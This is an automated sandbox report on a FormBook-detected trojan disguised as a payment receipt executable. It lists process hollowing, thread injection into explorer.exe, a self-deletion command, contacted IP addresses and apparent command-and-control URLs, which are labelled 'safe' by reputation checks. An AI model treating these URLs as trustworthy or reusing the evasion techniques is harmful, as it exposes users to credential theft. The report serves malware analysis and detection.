          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B2D8A mov eax, dword ptr fs:[00000030h]1_2_013B2D8A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B2D8A mov eax, dword ptr fs:[00000030h]1_2_013B2D8A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01468DF1 mov eax, dword ptr fs:[00000030h]1_2_01468DF1
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2581 mov eax, dword ptr fs:[00000030h]1_2_013E2581
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2581 mov eax, dword ptr fs:[00000030h]1_2_013E2581
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2581 mov eax, dword ptr fs:[00000030h]1_2_013E2581
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2581 mov eax, dword ptr fs:[00000030h]1_2_013E2581
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]1_2_01472D82
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]1_2_01472D82
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]1_2_01472D82
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]1_2_01472D82
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]1_2_01472D82
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]1_2_01472D82
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]1_2_01472D82
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CD5E0 mov eax, dword ptr fs:[00000030h]1_2_013CD5E0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CD5E0 mov eax, dword ptr fs:[00000030h]1_2_013CD5E0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014805AC mov eax, dword ptr fs:[00000030h]1_2_014805AC
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014805AC mov eax, dword ptr fs:[00000030h]1_2_014805AC
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E3C3E mov eax, dword ptr fs:[00000030h]1_2_013E3C3E
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E3C3E mov eax, dword ptr fs:[00000030h]1_2_013E3C3E
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E3C3E mov eax, dword ptr fs:[00000030h]1_2_013E3C3E
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EBC2C mov eax, dword ptr fs:[00000030h]1_2_013EBC2C
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144C450 mov eax, dword ptr fs:[00000030h]1_2_0144C450
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144C450 mov eax, dword ptr fs:[00000030h]1_2_0144C450
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0148740D mov eax, dword ptr fs:[00000030h]1_2_0148740D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0148740D mov eax, dword ptr fs:[00000030h]1_2_0148740D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0148740D mov eax, dword ptr fs:[00000030h]1_2_0148740D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436C0A mov eax, dword ptr fs:[00000030h]1_2_01436C0A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436C0A mov eax, dword ptr fs:[00000030h]1_2_01436C0A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436C0A mov eax, dword ptr fs:[00000030h]1_2_01436C0A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436C0A mov eax, dword ptr fs:[00000030h]1_2_01436C0A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D746D mov eax, dword ptr fs:[00000030h]1_2_013D746D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EA44B mov eax, dword ptr fs:[00000030h]1_2_013EA44B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01488CD6 mov eax, dword ptr fs:[00000030h]1_2_01488CD6
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C849B mov eax, dword ptr fs:[00000030h]1_2_013C849B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436CF0 mov eax, dword ptr fs:[00000030h]1_2_01436CF0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436CF0 mov eax, dword ptr fs:[00000030h]1_2_01436CF0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436CF0 mov eax, dword ptr fs:[00000030h]1_2_01436CF0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014714FB mov eax, dword ptr fs:[00000030h]1_2_014714FB
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]1_2_01474496
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB73D mov eax, dword ptr fs:[00000030h]1_2_013DB73D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB73D mov eax, dword ptr fs:[00000030h]1_2_013DB73D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E3F33 mov eax, dword ptr fs:[00000030h]1_2_013E3F33
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EE730 mov eax, dword ptr fs:[00000030h]1_2_013EE730
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B4F2E mov eax, dword ptr fs:[00000030h]1_2_013B4F2E
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B4F2E mov eax, dword ptr fs:[00000030h]1_2_013B4F2E
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471751 mov eax, dword ptr fs:[00000030h]1_2_01471751
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01488F6A mov eax, dword ptr fs:[00000030h]1_2_01488F6A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DF716 mov eax, dword ptr fs:[00000030h]1_2_013DF716
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E4710 mov eax, dword ptr fs:[00000030h]1_2_013E4710
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EA70E mov eax, dword ptr fs:[00000030h]1_2_013EA70E
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EA70E mov eax, dword ptr fs:[00000030h]1_2_013EA70E
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0148070D mov eax, dword ptr fs:[00000030h]1_2_0148070D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0148070D mov eax, dword ptr fs:[00000030h]1_2_0148070D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144FF10 mov eax, dword ptr fs:[00000030h]1_2_0144FF10
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144FF10 mov eax, dword ptr fs:[00000030h]1_2_0144FF10
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CFF60 mov eax, dword ptr fs:[00000030h]1_2_013CFF60
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CEF40 mov eax, dword ptr fs:[00000030h]1_2_013CEF40
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014717D2 mov eax, dword ptr fs:[00000030h]1_2_014717D2
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C8794 mov eax, dword ptr fs:[00000030h]1_2_013C8794
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F37F5 mov eax, dword ptr fs:[00000030h]1_2_013F37F5
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01437794 mov eax, dword ptr fs:[00000030h]1_2_01437794
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01437794 mov eax, dword ptr fs:[00000030h]1_2_01437794
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01437794 mov eax, dword ptr fs:[00000030h]1_2_01437794
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147AE44 mov eax, dword ptr fs:[00000030h]1_2_0147AE44
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147AE44 mov eax, dword ptr fs:[00000030h]1_2_0147AE44
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BE620 mov eax, dword ptr fs:[00000030h]1_2_013BE620
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EA61C mov eax, dword ptr fs:[00000030h]1_2_013EA61C
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EA61C mov eax, dword ptr fs:[00000030h]1_2_013EA61C
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BC600 mov eax, dword ptr fs:[00000030h]1_2_013BC600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BC600 mov eax, dword ptr fs:[00000030h]1_2_013BC600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BC600 mov eax, dword ptr fs:[00000030h]1_2_013BC600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov ecx, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov ecx, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov ecx, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D5600 mov ecx, dword ptr fs:[00000030h]1_2_013D5600
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\wlanext.exe; Process token adjusted: Debug
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe; Network Connect: 192.0.78.230 80
          Source: C:\Windows\explorer.exe; Network Connect: 162.0.236.49 80
          Source: C:\Windows\explorer.exe; Network Connect: 27.123.27.33 80
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Memory written: C:\Users\user\Desktop\Final-Payment-Receipt.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Thread register set: target process: 3472
          Source: C:\Windows\SysWOW64\wlanext.exe; Thread register set: target process: 3472
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: E10000
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Process created: C:\Users\user\Desktop\Final-Payment-Receipt.exe C:\Users\user\Desktop\Final-Payment-Receipt.exe
          Source: C:\Windows\SysWOW64\wlanext.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Final-Payment-Receipt.exe'
          Source: explorer.exe, 00000002.00000000.242407386.0000000005EA0000.00000004.00000001.sdmp, wlanext.exe, 00000003.00000002.492429748.0000000004C20000.00000002.00000001.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.235646997.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000003.00000002.492429748.0000000004C20000.00000002.00000001.sdmp; Binary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.235646997.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000003.00000002.492429748.0000000004C20000.00000002.00000001.sdmp; Binary or memory string: SProgram Managerl
          Source: explorer.exe, 00000002.00000000.235309423.0000000001128000.00000004.00000020.sdmp; Binary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000002.00000000.235646997.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000003.00000002.492429748.0000000004C20000.00000002.00000001.sdmp; Binary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000002.00000000.235646997.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000003.00000002.492429748.0000000004C20000.00000002.00000001.sdmp; Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Queries volume information: C:\Users\user\Desktop\Final-Payment-Receipt.exe VolumeInformation
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match; File source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match; File source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 221 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading 1 | LSASS Memory | Virtualization/Sandbox Evasion 3 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 3 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Disable or Modify Tools 1 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 3 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 612 | LSA Secrets | System Information Discovery 112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 4 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 3 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

          Behavior Graph

          [Behavior graph, image not preserved. Behavior Graph ID: 320833; Sample: Final-Payment-Receipt.exe; Startdate: 19/11/2020; Architecture: WINDOWS; Score: 100. Process chain: Final-Payment-Receipt.exe starts a second Final-Payment-Receipt.exe, which injects into explorer.exe; explorer.exe starts wlanext.exe, which starts cmd.exe, which starts conhost.exe.]

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          Final-Payment-Receipt.exe | 34% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
          Final-Payment-Receipt.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          1.2.Final-Payment-Receipt.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          https://themindofafunnygirl.com/71m/?Rzr0iD=rhJBnfA/e5RktQ98 | 0% | Avira URL Cloud | safe
          http://www.wacrox.com/71m/?Rzr0iD=xuMbXRqvcjTkPYem20N3vsgWyUob49TNzNry+QjPYNTyHJJexkEaphWMorU+NKluO0/a&ZL3=rVvxt090-21lhr | 0% | Avira URL Cloud | safe
